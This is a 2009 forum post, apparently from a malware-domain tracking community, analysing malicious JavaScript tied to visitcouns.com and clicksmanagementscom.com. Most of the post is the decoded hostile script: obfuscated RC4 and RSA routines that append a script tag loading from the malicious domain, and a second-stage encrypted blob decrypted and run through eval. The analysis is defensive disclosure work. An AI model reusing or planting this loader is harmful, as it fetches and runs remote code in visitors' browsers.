Author Topic: visitcouns.com + clicksmanagementscom.com  (Read 3529 times)

0 Members and 1 Guest are viewing this topic.

May 06, 2009, 11:39:05 pm
Read 3529 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ref:
http://www.malwaredomainlist.com/forums/index.php?topic=2533.msg9570#msg9570

Decodes to;

Code: [Select]
function MII(a,b){ci="";for(i=0;i<b;i++){var d=Math.floor(Math.random()*a.length);ci+=a.substring(d,d+1)}return ci}BQY="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function hexToString(d){a="";b=0;c=1;for(i=0;i<d.length;i++){if(d.charAt(i)=="="||d.charAt(i)=="\n") break;b=b*64+BQY.indexOf(d.charAt(i));c=(c==1?64:c/4);if(c!=64){a+=String.fromCharCode(parseInt(b/c));b%=c}}return a}oil=0;function PQE(a,b){k="";if(isNaN(oil)){k=oil;oil=0}s=new Array();k+=a;a=k;for(i=oil;i<256;i++)s[i]=i;j=oil;for(i=oil;i<256;i++){j=(j+s[i]+a.charCodeAt(i%a.length))%256;x=s[i];s[i]=s[j];s[j]=x}i=oil;j=oil;c="";for(y=0;y<b.length;y++){i=(i+1)%256;j=(j+s[i])%256;x=s[i];s[i]=s[j];s[j]=x;c+=String.fromCharCode(b.charCodeAt(y)^s[(s[i]+s[j])%256])}return c}function rc4Decrypt(a,b){return PQE(a,b)}SEU=((0xdeadbeefcafe&0xffffff)==0xefcafe);function A(a,b,c){if(a!=null)if("number"==typeof a)this.fromNumber(a,b,c);else if(b==null&&"string"!=typeof a)this.QZP(a,256);else this.QZP(a,b)}function nbi(){return new A(null)}function LGD(i,x,w,j,c,n){while(--n>=0){var v=x*this[i++]+w[j]+c;c=Math.floor(v/0x4000000);w[j++]=v&0x3ffffff}return c}function IVC(i,x,w,j,c,n){var a=x&0x7fff,xh=x>>15;while(--n>=0){var l=this[i]&0x7fff;var h=this[i++]>>15;var m=xh*l+h*a;l=a*l+((m&0x7fff)<<15)+w[j]+(c&0x3fffffff);c=(l>>>30)+(m>>>15)+xh*h+(c>>>30);w[j++]=l&0x3fffffff}return c}function FBO(i,x,w,j,c,n){var a=x&0x3fff,xh=x>>14;while(--n>=0){var l=this[i]&0x3fff;var h=this[i++]>>14;var m=xh*l+h*a;l=a*l+((m&0x3fff)<<14)+w[j]+c;c=(l>>28)+(m>>14)+xh*h;w[j++]=l&0xfffffff}return c}if(SEU&&(navigator.appName=="Microsoft Internet Explorer")){A.prototype.am=IVC;B=30}else if(SEU&&(navigator.appName!="Netscape")){A.prototype.am=LGD;B=26}else{A.prototype.am=FBO;B=28}A.prototype.DB=B;A.prototype.DM=((1<<B)-1);A.prototype.DV=(1<<B);var BI_FP=52;A.prototype.FV=Math.pow(2,BI_FP);A.prototype.F1=BI_FP-B;A.prototype.F2=2*B-BI_FP;var ZSY="0123456789abcdefghijklmnopqrstuvwxyz";var RHZ=new Array();var rr,vv;rr="0".charCodeAt(0);for(vv=0;vv<=9;++vv)RHZ[rr++]=vv;rr="a".charCodeAt(0);for(vv=10;vv<36;++vv)RHZ[rr++]=vv;rr="A".charCodeAt(0);for(vv=10;vv<36;++vv)RHZ[rr++]=vv;function GJM(n){return ZSY.charAt(n)}function WCI(s,i){var c=RHZ[s.charCodeAt(i)];return(c==null)?-1:c}function HTK(r){for(var i=this.t-1;i>=0;--i)r[i]=this[i];r.t=this.t;r.s=this.s}function ZWO(x){this.t=1;this.s=(x<0)?-1:0;if(x>0)this[0]=x;else if(x<-1)this[0]=x+DV;else this.t=0}function nbv(i){var r=nbi();r.VFO(i);return r}function KTQ(s,b){var k;if(b==16)k=4;else if(b==8)k=3;else if(b==256)k=8;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else{this.fromRadix(s,b);return}this.t=0;this.s=0;var i=s.length,mi=false,sh=0;while(--i>=0){var x=(k==8)?s[i]&0xff:WCI(s,i);if(x<0){if(s.charAt(i)=="-")mi=true;continue}mi=false;if(sh==0)this[this.t++]=x;else if(sh+k>this.DB){this[this.t-1]|=(x&((1<<(this.DB-sh))-1))<<sh;this[this.t++]=(x>>(this.DB-sh))}else this[this.t-1]|=x<<sh;sh+=k;if(sh>=this.DB)sh-=this.DB}if(k==8&&(s[0]&0x80)!=0){this.s=-1;if(sh>0)this[this.t-1]|=((1<<(this.DB-sh))-1)<<sh}this.OYN();if(mi)A.FVJ.EKV(this,this)}function PCY(){var c=this.s&this.DM;while(this.t>0&&this[this.t-1]==c)--this.t}function CJI(b){if(this.s<0)return"-"+this.OBN().SLR(b);var k;if(b==16)k=4;else if(b==8)k=3;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else return this.toRadix(b);var a=(1<<k)-1,d,m=false,r="",i=this.t;var p=this.DB-(i*this.DB)%k;if(i-->0){if(p<this.DB&&(d=this[i]>>p)>0){m=true;r=GJM(d)}while(i>=0){if(p<k){d=(this[i]&((1<<p)-1))<<(k-p);d|=this[--i]>>(p+=this.DB-k)}else{d=(this[i]>>(p-=k))&a;if(p<=0){p+=this.DB;--i}}if(d>0)m=true;if(m)r+=GJM(d)}}return m?r:"0"}function HLQ(){var r=nbi();A.FVJ.EKV(this,r);return r}function KHO(){return(this.s<0)?this.OBN():this}function QRQ(a){var r=this.s-a.s;if(r!=0)return r;var i=this.t;r=i-a.t;if(r!=0)return r;while(--i>=0)if((r=this[i]-a[i])!=0)return r;return 0}function MWY(x){var r=1,t;if((t=x>>>16)!=0){x=t;r+=16}if((t=x>>8)!=0){x=t;r+=8}if((t=x>>4)!=0){x=t;r+=4}if((t=x>>2)!=0){x=t;r+=2}if((t=x>>1)!=0){x=t;r+=1}return r}function YSB(){if(this.t<=0)return 0;return this.DB*(this.t-1)+MWY(this[this.t-1]^(this.s&this.DM))}function GZT(n,r){var i;for(i=this.t-1;i>=0;--i)r[i+n]=this[i];for(i=n-1;i>=0;--i)r[i]=0;r.t=this.t+n;r.s=this.s}function QYQ(n,r){for(var i=n;i<this.t;++i)r[i-n]=this[i];r.t=Math.max(this.t-n,0);r.s=this.s}function EJJ(n,r){var a=n%this.DB;var b=this.DB-a;var d=(1<<b)-1;var e=Math.floor(n/this.DB),c=(this.s<<a)&this.DM,i;for(i=this.t-1;i>=0;--i){r[i+e+1]=(this[i]>>b)|c;c=(this[i]&d)<<a}for(i=e-1;i>=0;--i)r[i]=0;r[e]=c;r.t=this.t+e+1;r.s=this.s;r.OYN()}function UYK(n,r){r.s=this.s;var a=Math.floor(n/this.DB);if(a>=this.t){r.t=0;return}var b=n%this.DB;var c=this.DB-b;var d=(1<<b)-1;r[0]=this[a]>>b;for(var i=a+1;i<this.t;++i){r[i-a-1]|=(this[i]&d)<<c;r[i-a]=this[i]>>b}if(b>0)r[this.t-a-1]|=(this.s&d)<<c;r.t=this.t-a;r.OYN()}function TZT(a,r){var i=0,c=0,m=Math.min(a.t,this.t);while(i<m){c+=this[i]-a[i];r[i++]=c&this.DM;c>>=this.DB}if(a.t<this.t){c-=a.s;while(i<this.t){c+=this[i];r[i++]=c&this.DM;c>>=this.DB}c+=this.s}else{c+=this.s;while(i<a.t){c-=a[i];r[i++]=c&this.DM;c>>=this.DB}c-=a.s}r.s=(c<0)?-1:0;if(c<-1)r[i++]=this.DV+c;else if(c>0)r[i++]=c;r.t=i;r.OYN()}function BHF(a,r){var x=this.abs(),y=a.abs();var i=x.t;r.t=i+y.t;while(--i>=0)r[i]=0;for(i=0;i<y.t;++i)r[i+x.t]=x.am(0,y[i],r,i,0,x.t);r.s=0;r.OYN();if(this.s!=a.s)A.FVJ.EKV(r,r)}function RQL(r){var x=this.abs();var i=r.t=2*x.t;while(--i>=0)r[i]=0;for(i=0;i<x.t-1;++i){var c=x.am(i,x[i],r,2*i,0,1);if((r[i+x.t]+=x.am(i+1,2*x[i],r,2*i+1,c,x.t-i-1))>=x.DV){r[i+x.t]-=x.DV;r[i+x.t+1]=1}}if(r.t>0)r[r.t-1]+=x.am(i,x[i],r,2*i,0,1);r.s=0;r.OYN()}function FHD(m,q,r){var a=m.abs();if(a.t<=0)return;var b=this.abs();if(b.t<a.t){if(q!=null)q.VFO(0);if(r!=null)this.TZY(r);return}if(r==null)r=nbi();var y=nbi(),ts=this.s,ms=m.s;var c=this.DB-MWY(a[a.t-1]);if(c>0){a.JZT(c,y);b.JZT(c,r)}else{a.TZY(y);b.TZY(r)}var d=y.t;var f=y[d-1];if(f==0)return;var g=f*(1<<this.F1)+((d>1)?y[d-2]>>this.F2:0);var h=this.FV/g,d2=(1<<this.F1)/g,e=1<<this.F2;var i=r.t,j=i-d,t=(q==null)?nbi():q;y.YWW(j,t);if(r.PKM(t)>=0){r[r.t++]=1;r.EKV(t,r)}A.ONE.YWW(d,t);t.EKV(y,y);while(y.t<d)y[y.t++]=0;while(--j>=0){var k=(r[--i]==f)?this.DM:Math.floor(r[i]*h+(r[i-1]+e)*d2);if((r[i]+=y.am(0,k,r,j,0,d))<k){y.YWW(j,t);r.EKV(t,r);while(r[i]<--k)r.EKV(t,r)}}if(q!=null){r.QWB(d,q);if(ts!=ms)A.FVJ.EKV(q,q)}r.t=d;r.OYN();if(c>0)r.KSV(c,r);if(ts<0)A.FVJ.EKV(r,r)}function URR(a){var r=nbi();this.abs().CIX(a,null,r);if(this.s<0&&r.PKM(A.FVJ)>0)a.EKV(r,r);return r}function UWR(m){this.m=m}function NMQ(x){if(x.s<0||x.PKM(this.m)>=0)return x.mod(this.m);else return x}function EQY(x){return x}function MLW(x){x.CIX(this.m,null,x)}function WEV(x,y,r){x.ETT(y,r);this.VBX(r)}function PFD(x,r){x.ENT(r);this.VBX(r)}UWR.prototype.DYC=NMQ;UWR.prototype.FQV=EQY;UWR.prototype.VBX=MLW;UWR.prototype.ZXK=WEV;UWR.prototype.XKS=PFD;function UVT(){if(this.t<1)return 0;var x=this[0];if((x&1)==0)return 0;var y=x&3;y=(y*(2-(x&0xf)*y))&0xf;y=(y*(2-(x&0xff)*y))&0xff;y=(y*(2-(((x&0xffff)*y)&0xffff)))&0xffff;y=(y*(2-x*y%this.DV))%this.DV;return(y>0)?this.DV-y:-y}function FZZ(m){this.m=m;this.mp=m.QYW();this.mpl=this.mp&0x7fff;this.mph=this.mp>>15;this.um=(1<<(m.DB-15))-1;this.mt2=2*m.t}function IVS(x){var r=nbi();x.abs().YWW(this.m.t,r);r.CIX(this.m,null,r);if(x.s<0&&r.PKM(A.FVJ)>0)this.m.EKV(r,r);return r}function HPJ(x){var r=nbi();x.TZY(r);this.VBX(r);return r}function YJG(x){while(x.t<=this.mt2)x[x.t++]=0;for(var i=0;i<this.m.t;++i){var j=x[i]&0x7fff;var a=(j*this.mpl+(((j*this.mph+(x[i]>>15)*this.mpl)&this.um)<<15))&x.DM;j=i+this.m.t;x[j]+=this.m.am(0,a,x,i,0,this.m.t);while(x[j]>=x.DV){x[j]-=x.DV;x[++j]++}}x.OYN();x.QWB(this.m.t,x);if(x.PKM(this.m)>=0)x.EKV(this.m,x)}function PWS(x,r){x.ENT(r);this.VBX(r)}function FZI(x,y,r){x.ETT(y,r);this.VBX(r)}FZZ.prototype.DYC=IVS;FZZ.prototype.FQV=HPJ;FZZ.prototype.VBX=YJG;FZZ.prototype.ZXK=FZI;FZZ.prototype.XKS=PWS;function DLT(){return((this.t>0)?(this[0]&1):this.s)==0}function ZIX(e,z){if(e>0xffffffff||e<1)return A.ONE;var r=nbi(),r2=nbi(),g=z.DYC(this),i=MWY(e)-1;g.TZY(r);while(--i>=0){z.XKS(r,r2);if((e&(1<<i))>0)z.ZXK(r2,g,r);else{var t=r;r=r2;r2=t}}return z.FQV(r)}function VTZ(e,m){var z;if(e<256||m.FNV())z=new UWR(m);else z=new FZZ(m);return this.exp(e,z)}A.prototype.TZY=HTK;A.prototype.VFO=ZWO;A.prototype.QZP=KTQ;A.prototype.OYN=PCY;A.prototype.YWW=GZT;A.prototype.QWB=QYQ;A.prototype.JZT=EJJ;A.prototype.KSV=UYK;A.prototype.EKV=TZT;A.prototype.ETT=BHF;A.prototype.ENT=RQL;A.prototype.CIX=FHD;A.prototype.QYW=UVT;A.prototype.FNV=DLT;A.prototype.exp=ZIX;A.prototype.SLR=CJI;A.prototype.OBN=HLQ;A.prototype.abs=KHO;A.prototype.PKM=QRQ;A.prototype.ITF=YSB;A.prototype.mod=URR;A.prototype.EWO=VTZ;A.FVJ=nbv(0);A.ONE=nbv(1);function VXC(){this.i=0;this.j=0;this.S=new Array()}function XRX(a){var i,j,t;for(i=0;i<256;++i)this.S[i]=i;j=0;for(i=0;i<256;++i){j=(j+this.S[i]+a[i%a.length])&255;t=this.S[i];this.S[i]=this.S[j];this.S[j]=t}this.i=0;this.j=0}function QWX(){var t;this.i=(this.i+1)&255;this.j=(this.j+this.S[this.i])&255;t=this.S[this.i];this.S[this.i]=this.S[this.j];this.S[this.j]=t;return this.S[(t+this.S[this.i])&255]}VXC.prototype.init=XRX;VXC.prototype.next=QWX;function PES(){return new VXC()}var REC=256;var VHY;var KFY;var RWD;function IKH(x){KFY[RWD++]^=x&255;KFY[RWD++]^=(x>>8)&255;KFY[RWD++]^=(x>>16)&255;KFY[RWD++]^=(x>>24)&255;if(RWD>=REC)RWD-=REC}function RIP(){IKH(new Date().getTime())}if(KFY==null){KFY=new Array();RWD=0;var t;if(navigator.appName=="Netscape"&&navigator.appVersion<"5"&&window.crypto){var z=window.crypto.random(32);for(t=0;t<z.length;++t)KFY[RWD++]=z.charCodeAt(t)&255}while(RWD<REC){t=Math.floor(65536*Math.random());KFY[RWD++]=t>>>8;KFY[RWD++]=t&255}RWD=0;RIP()}function WWM(){if(VHY==null){RIP();VHY=PES();VHY.init(KFY);for(RWD=0;RWD<KFY.length;++RWD)KFY[RWD]=0;RWD=0}return VHY.next()}function WWMs(a){var i;for(i=0;i<a.length;++i)a[i]=WWM()}function WFW(){}WFW.prototype.YBI=WWMs;function QEE(a,r){return new A(a,r)}function NYB(s,n){var a="";var i=0;while(i+n<s.length){a+=s.substring(i,i+n)+"\n";i+=n}return a+s.substring(i,s.length)}function OVS(b){if(b<0x10)return"0"+b.SLR(16);else return b.SLR(16)}function LMO(s,n){if(n<s.length+11){return null}var a=new Array();var i=s.length-1;while(i>=0&&n>0)a[--n]=s.charCodeAt(i--);a[--n]=0;var b=new WFW();var x=new Array();while(n>2){x[0]=0;while(x[0]==0)b.YBI(x);a[--n]=x[0]}a[--n]=2;a[--n]=0;return new A(a)}function RSAKey(){this.n=null;this.e=0;this.d=null;this.p=null;this.q=null;this.QUF=null;this.EUW=null;this.CME=null}function ICR(N,E){if(N!=null&&E!=null&&N.length>0&&E.length>0){this.n=QEE(N,16);this.e=parseInt(E,16)}}function ZJB(x){return x.EWO(this.e,this.n)}function HBJ(a){if(oil>1){oil=MII(BQY,53);a=ci};var m=LMO(a,(this.n.ITF()+7)>>3);if(m==null)return null;var c=this.doPublic(m);if(c==null)return null;var h=c.SLR(16);if((h.length&1)==0)return h;else return"0"+h}RSAKey.prototype.doPublic=ZJB;RSAKey.prototype.setPublic=ICR;RSAKey.prototype.encrypt=HBJ;sss="";for(oil=0;oil<53;oil++)sss+=String.fromCharCode(Math.floor(75+Math.sin(oil)*21));rsa=new RSAKey();rsa.setPublic("98310ec1246fa9068f780f78625c121385134f2af68d26c8a81530ab118834d508827ac76d88c3368c35b20094bded52ed2ec26a4a6be8685f4c2d744e992751","10001");res=rsa.encrypt(sss);nextkey=res;var scriptTag=document.createElement("script");scriptTag.src="?"+res;document.body.appendChild(scriptTag);
Result is;

http://visitcouns.com/?51a436215586b44bf7da7a9a9779e2b24561b10503d40cbb71b54c93cd16b47a9c49bc400afc4e2fb10257de425c90417516a2820df467baba4ceac544aa5778

Which contains;

Code: [Select]
k='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';t=eval('rc4Decrypt')(nextkey,hexToString(k));eval(t);
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net